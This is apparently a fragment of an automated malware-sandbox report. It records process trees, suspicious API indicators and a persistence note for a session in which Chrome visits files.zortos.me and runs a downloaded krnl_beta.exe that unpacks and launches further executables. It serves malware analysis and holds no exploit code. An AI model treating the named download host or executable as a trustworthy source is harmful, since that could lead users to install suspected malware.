2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
4124	7zFM.exe
4124	7zFM.exe
5588	msedge.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
5008	conhost.exe
5008	conhost.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.execonhost.exeparsecd.exe

pid	process
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
4364	parsecd.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe
5008	conhost.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

parsecd.exeTheLongDrive.exe

pid process

4364 parsecd.exe
4364 parsecd.exe
1464 TheLongDrive.exe

pid	process
4364	parsecd.exe
4364	parsecd.exe
1464	TheLongDrive.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 2044 wrote to memory of 4492	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4492	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2300	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2540	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 2540	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe
PID 2044 wrote to memory of 4972	2044	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" http://files.zortos.me
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd1db39758,0x7ffd1db39768,0x7ffd1db39778
2⤵
PID:4492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1800 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:2
2⤵
PID:2300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:2540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2228 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:4972

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3104 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:1
2⤵
PID:1208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:1
2⤵
PID:1476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4508 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:1
2⤵
PID:1980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4876 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:1
2⤵
PID:400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5096 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:1
2⤵
PID:1872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5192 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:3752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5380 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:3860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5528 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:1
2⤵
PID:3948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4876 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:2512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5912 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:2920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5860 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:1
2⤵
PID:4752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4964 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:1308

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3940 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:4688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5680 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:3876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5872 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:4860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4516 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4900 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:3544

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4552 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:1
2⤵
PID:1964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5292 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:1
2⤵
PID:2632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5632 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:3312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5604 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:2156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6188 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:1
2⤵
PID:3692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=1768 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:1
2⤵
PID:4456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3960 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:4668

C:\Users\Admin\Downloads\krnl_beta.exe
"C:\Users\Admin\Downloads\krnl_beta.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:4236

C:\Users\Admin\AppData\Roaming\Krnl\Data\7za.exe
"C:\Users\Admin\AppData\Roaming\Krnl\Data\7za.exe" x "C:\Users\Admin\AppData\Roaming\Krnl\krnl.7z" -o"C:\Users\Admin\AppData\Roaming\Krnl" -aoa -bsp1
3⤵
- Executes dropped EXE
PID:1120

C:\Users\Admin\AppData\Roaming\Krnl\Data\7za.exe
"C:\Users\Admin\AppData\Roaming\Krnl\Data\7za.exe" x "C:\Users\Admin\AppData\Roaming\Krnl\Data\Community.7z" -o"C:\Users\Admin\AppData\Roaming\Krnl\Community" -aoa -bsp1
3⤵
- Executes dropped EXE
PID:5072

C:\Users\Admin\AppData\Roaming\Krnl\KrnlUI.exe
"C:\Users\Admin\AppData\Roaming\Krnl\KrnlUI.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:460

C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe
"C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe" --type=gpu-process --no-sandbox --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --cefsharpexitsub --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --log-file="C:\Users\Admin\AppData\Roaming\Krnl\debug.log" --mojo-platform-channel-handle=2228 --field-trial-handle=2296,i,1237983042029226177,9656572432037814091,131072 --disable-features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2 --host-process-id=460
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4016

C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe
"C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --cefsharpexitsub --log-file="C:\Users\Admin\AppData\Roaming\Krnl\debug.log" --mojo-platform-channel-handle=2240 --field-trial-handle=2296,i,1237983042029226177,9656572432037814091,131072 --disable-features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 --host-process-id=460
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4896

C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe
"C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --cefsharpexitsub --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Krnl\debug.log" --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3076 --field-trial-handle=2296,i,1237983042029226177,9656572432037814091,131072 --disable-features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker --host-process-id=460 /prefetch:1
4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1196

C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe
"C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --cefsharpexitsub --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Krnl\debug.log" --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=3084 --field-trial-handle=2296,i,1237983042029226177,9656572432037814091,131072 --disable-features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker --host-process-id=460 /prefetch:1
4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3224

C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe
"C:\Users\Admin\AppData\Roaming\Krnl\bin\CefSharp.BrowserSubprocess.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=utility --no-sandbox --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --cefsharpexitsub --log-file="C:\Users\Admin\AppData\Roaming\Krnl\debug.log" --mojo-platform-channel-handle=2000 --field-trial-handle=2296,i,1237983042029226177,9656572432037814091,131072 --disable-features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 --host-process-id=460
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5192 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=5928 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:1
2⤵
PID:3564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=4620 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:1
2⤵
PID:2876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=5980 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:1
2⤵
PID:2900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6012 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:1476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:2820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4932 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:5740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4536 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:6020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:6096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6372 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:5856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6212 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:5812

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=3904 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:1
2⤵
PID:5652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6232 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:3912

